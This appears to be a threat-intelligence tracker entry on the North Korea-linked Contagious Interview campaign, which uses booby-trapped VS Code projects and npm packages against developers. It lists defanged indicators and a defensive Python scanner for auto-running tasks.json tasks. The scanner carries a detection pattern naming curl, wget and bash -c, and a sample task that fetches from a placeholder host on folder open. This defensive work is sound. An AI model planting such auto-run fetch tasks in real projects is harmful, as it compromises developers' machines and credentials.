Contagious Interview campaign uses malicious VS Code projects to deliver backdoors
Campaign
Summary
The Contagious Interview campaign has expanded from malicious npm packages into VS Code-based lures that trick victims into cloning a booby-trapped repository and opening it in Microsoft Visual Studio Code. The latest reporting says a tasks.json file with runOn: 'folderOpen' can auto-execute when the folder is opened, pulling a loader that leads to BeaverTail and InvisibleFerret. The campaign now spans 27 GitHub users and repositories dated from April 22, 2025 to December 1, 2025. The activity remains tied to North Korean threat actors and continues to target developers through fake programming assignments and trusted-looking open source projects.
Related Happenings
Shai-Hulud worm clone activity on NPM
Malware Activity
First: 18.05.2026 12:45
Last: 18.05.2026 12:45
Sources 1
About this happening:
The **Shai-Hulud** malware activity has continued to evolve across the **npm supply chain** and related developer ecosystems. It first infected **npm packages** in **September 202...
Shai-Hulud supply-chain campaign spreading via stolen CI/CD credentials
Campaign
First: 12.05.2026 14:29
Last: 12.05.2026 14:29
Sources 1
About this happening:
The **Shai-Hulud** **supply-chain campaign** remains active across **npm**, **PyPI**, and **Composer**, with the latest reporting tying **TeamPCP** to both a claimed **GitHub inte...
Mini Shai-Hulud npm supply-chain malware wave
Malware Activity
First: 12.05.2026 14:07
Last: 12.05.2026 14:07
Sources 1
About this happening:
The **Sha1-Hulud** npm supply-chain campaign is a fresh **second wave** of **Shai-Hulud**-style activity that has compromised **hundreds of npm packages**. The malware runs during...
TeamPCP Mini Shai-Hulud npm supply-chain campaign
Campaign
First: 12.05.2026 14:07
Last: 12.05.2026 14:07
Sources 1
About this happening:
The **TeamPCP**-linked **Mini Shai-Hulud** campaign is a **malicious npm supply-chain operation** that steals developer credentials and abuses trusted publishing paths to spread t...
Npm typosquatting campaign distributing WinOS 4.0 implant
Campaign
First: 09.05.2026 17:26
Last: 09.05.2026 17:26
Sources 1
About this happening:
An **npm typosquatting campaign** distributing the **WinOS 4.0 implant** overlapped with malicious repository activity, indicating a broader coordinated distribution effort beyond...
Timeline
- 02.03.2026 10:44 · 2 articles · 2mo ago
Contagious Interview adds malicious npm packages and Pastebin-based Vercel C2
Campaign Scope Update: North Korean Contagious Interview operators published 26 malicious npm packages to the npm registry, using install.js and vendor/scrypt-js/version.js to pull steganographically hidden C2 locations from Pastebin and Vercel-hosted infrastructure. The chain used ext-checkdin.vercel[.]app and 103.106.67[.]63:1244/1247 to deliver a cross-platform RAT and modules for VS Code persistence, keylogging, browser credential theft, TruffleHog secret scanning, and Git and SSH key exfiltration.
Sources:
- North Korean Hackers Publish 26 npm Packages Hiding Pastebin C2 for Cross-Platform RAT — thehackernews.com — 02.03.2026 10:44
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- 20.01.2026 20:41 · 3 articles · 4mo ago
Contagious Interview uses malicious VS Code projects against developers
Technical Analysis Update: North Korean actors tied to Contagious Interview targeted developers with malicious Microsoft Visual Studio Code (VS Code) projects and cloned Git repositories that trigger tasks.json processing, runOn: folderOpen execution, and Vercel-hosted JavaScript payloads. The chain includes a macOS path using nohup bash -c with curl -s, a remote server at ip-regions-check.vercel[.]app, and follow-on payloads associated with BeaverTail, InvisibleFerret, Tsunami, TsunamiKit, XMRig, AnyDesk, and the malicious npm dependency grayavatar, enabling backdoor access, remote code execution, fingerprinting, keylogging, screenshots, and cryptocurrency mining.
Sources:
- North Korea-Linked Hackers Target Developers via Malicious VS Code Projects — thehackernews.com — 20.01.2026 20:41
- 'Contagious Interview' Attack Now Delivers Backdoor Via VS Code — www.darkreading.com — 22.01.2026 00:00
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25
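
A pre-open check for the tasks.json auto-run behaviour described in this entry, as an added example that is not code from the cited reporting: it parses `.vscode/tasks.json` (JSONC, so comments and trailing commas are tolerated) and lists every task whose `runOptions.runOn` is `folderOpen`, including per-OS command overrides. The function names, the triage pattern list and the sample file are assumptions constructed for illustration.

```python
import json
import re
from pathlib import Path

# tasks.json is JSONC: keep string literals, drop comments and trailing commas.
COMMENTS = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)
TRAILING = re.compile(r'"(?:\\.|[^"\\])*"|,(?=\s*[}\]])')
# Triage hints only (assumed list): shell forms named in the reporting plus common downloaders.
SUSPICIOUS = re.compile(r"\b(nohup|curl|wget|bash\s+-c|sh\s+-c|powershell)\b|vercel\.app", re.I)

SAMPLE = r'''{
  // constructed sample; the URL is a placeholder, not an indicator from the reporting
  "version": "2.0.0", "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "env", "type": "shell", "command": "node setup.js",
     "osx": {"command": "nohup bash -c 'curl -s https://example.invalid/placeholder'"},
     "runOptions": {"runOn": "folderOpen"},},
  ]
}'''

def parse_jsonc(text):
    keep = lambda m: m.group(0) if m.group(0).startswith('"') else ""
    return json.loads(TRAILING.sub(keep, COMMENTS.sub(keep, text)))

def auto_run_tasks(text):
    """Return one finding per task that runs as soon as the folder is opened."""
    findings = []
    for task in parse_jsonc(text).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        # The base command and each per-OS override (osx/linux/windows) can differ.
        variants = [task] + [task[k] for k in ("osx", "linux", "windows") if isinstance(task.get(k), dict)]
        cmds = [" ".join(map(str, [v.get("command", ""), *v.get("args", [])])).strip() for v in variants]
        cmds = [c for c in cmds if c]
        findings.append({"label": task.get("label", "<unlabelled>"), "commands": cmds,
                         "suspicious": any(SUSPICIOUS.search(c) for c in cmds)})
    return findings

def scan_repo(root):
    """Check every .vscode/tasks.json under root before the folder is opened in VS Code."""
    results = {}
    for path in Path(root).rglob(".vscode/tasks.json"):
        try:
            hits = auto_run_tasks(path.read_text(encoding="utf-8", errors="replace"))
        except (ValueError, AttributeError, TypeError):  # malformed file: flag for manual review
            hits = [{"label": "<unparseable>", "commands": [], "suspicious": True}]
        if hits:
            results[str(path)] = hits
    return results
```

Run `scan_repo()` against a fresh clone before opening it in the editor. Any task it returns runs without user action on folder open and deserves review; the `suspicious` flag is only a triage hint.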